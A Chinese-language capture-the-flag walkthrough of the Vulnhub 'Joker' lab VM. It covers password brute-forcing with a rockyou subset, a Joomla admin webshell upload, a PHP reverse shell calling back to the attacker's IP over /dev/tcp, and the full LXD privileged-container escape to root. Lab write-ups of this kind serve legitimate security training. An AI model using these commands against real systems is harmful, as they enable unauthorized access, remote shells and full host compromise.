Vulnhub-Joker

口令字典爆破+joomla CMS漏洞+LXD容器提权

Joker靶场 下载地址

靶机下载后用vm打开,保持开启状态就好

Kali和靶机同为桥接模式,所在网段为192.168.13.0/24

wps54

namp扫描13网段信息

wps55

192.168.13.1 这台应该是靶机,其他的是我自己的物理机254和kali机90,以及网关111

得知开放端口有22、80、8080

wps56

8080这个端口需要账户密码

wps57

尝试爆破子目录 dirsearch,phpinfo.php和secret.txt

wps58

wps59

wps60

没啥用

前面的8080登录框,尝试弱口令爆破

随便输入123,123 抓包分析,发现有base64加密的信息

wps61

放到解码,发现就是之前随便填的数字

wps62

网页信息多次提示jocker,secret.txt也提示说前100(密码本是rockyou.txt字典前100的)

wps63

解压rockyou字典

wps64

取前100行信息

wps65

wps66

对爆破的payload设置(猜测jocker为用户名,需要爆破密码),取消url编码,添加前缀joker: ,并且设置base64编码

wps67

wps68

最后得出攻击结果

wps69

解码得到

wps70

用户名joker

密码:hannah

登录页面,这是一个joomla CMS

wps71

wps72

百度搜索相关cms 信息,可以得知joomla的默认后台登录页面为:/administrator

默认账户密码:joomla/joomla

wps73

wps74

成功进入后台:

wps75

利用上传点,写入shell

wps76

wps77

wps78

wps79

使用蚁剑连接,配置请求信息

wps80

wps81

hannah编码后为am9rZXI6aGFubmFo

wps82

连接成功

创建反弹shell

<?php

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.13.90/4444 0>&1'");

?>

wps83

wps84

开启监听端口4444

wps85

wps86

当前 用户id组 需要提权,

wps87

通过LXD容器提权,升为root权限

下载lxd容器

wps88

把lxd上传到web服务器

wps89

wps90

靶机下载对应文件

wps91

wps92

完整命令:

导入镜像

lxc image import ./alpine-v3.11-x86_64-20200420_1518.tar.gz --alias myimage

查看可用镜像,检查是否导入成功

lxc image list

使用刚才导入的镜像创建一个容器实例

lxc init myimage ignite -c security.privileged=true

添加设备,进行挂载

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

启动容器

lxc start ignite

执行命令

lxc exec ignite /bin/sh

到此完成提权

id 

cd /mnt/root/root

ls

cat final.txt

wps93

解题参考 https://blog.csdn.net/2301_79441074/article/details/134584051?fromshare=blogdetail&sharetype=blogdetail&sharerId=134584051&sharerefer=PC&sharesource=qq_62118373&sharefrom=from_link